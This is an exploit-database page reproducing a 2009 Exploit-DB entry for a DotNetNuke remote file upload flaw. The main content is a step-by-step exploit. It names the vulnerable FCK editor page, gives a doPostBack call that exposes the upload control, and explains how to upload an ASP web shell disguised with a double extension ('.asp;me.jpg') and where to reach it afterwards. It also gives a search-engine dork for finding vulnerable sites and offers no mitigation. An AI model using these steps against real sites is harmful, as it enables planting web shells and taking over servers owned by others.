header-logo
Suggest Exploit
vendor:
DotNetNuke
by:
Ra3cH & Ma3sTr0-Dz
7,5
CVSS
HIGH
Remote File upload
Not available
CWE
Product Name: DotNetNuke
Affected Version From: Not available
Affected Version To: Not available
Patch Exists: Not available
Related CWE: Not available
CPE: Not available
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Not available
2009

DotNetNuke Remote File upload Vulnerability

Original discovery and credit goes to: Alireza Afzali of ISCN Team. Found date: 5/17/2009. Exploit: http://[PATH]/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx. AnD Add : javascript:__doPostBack('ctlURL$cmdUpload',''). AnD UpLOaD YoUr ShEll AsP LiKe Dz4aLL.asp;me.jpg. you find your Shell Hier http://[PATH]/portals/0/dz4all.asp;me.jpg

Mitigation:

Not available
Source

Exploit-DB raw data:

************************************************************
**      DotNetNuke Remote File upload Vulnerability 
************************************************************
**  Prodcut:        DotNetNuke   
**  Home   :         www.DZ4All.cOm/Cc
**  Vunlerability :    Remote File upload
**  Risk  :        High
**  Dork :         inurl:tabid/176/Default.aspx or inurl:portals/0/
************************************************************
**
** Original discovery and credit goes to: Alireza Afzali of ISCN Team
** Found date: 5/17/2009
** http://securityreason.com/exploitalert/6234
**
** Authors     :    Ra3cH & Ma3sTr0-Dz
** From        :    Algeria
** Contact     :     e51@hotmail.fr
** *********************************************************
** Greetz to :     ALLAH 
**         All Members of  http://www.DZ4All.cOm/Cc
**         And My BrOther AnGeL25dZ & yasMouh & ProToCoL & Mr.Benladen & Ma3sTr0-Dz
************************************************************
**  Exploit:
**  http://[PATH]/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
**
**  AnD Add :  javascript:__doPostBack('ctlURL$cmdUpload','')
**
** 
**  AnD UpLOaD YoUr ShEll AsP LiKe    Dz4aLL.asp;me.jpg  
************************************************************
**
**  you find your Shell Hier 
**
**  http://[PATH]/portals/0/dz4all.asp;me.jpg
*************************************************************

Navigation

Suggest Exploit

Services By CQR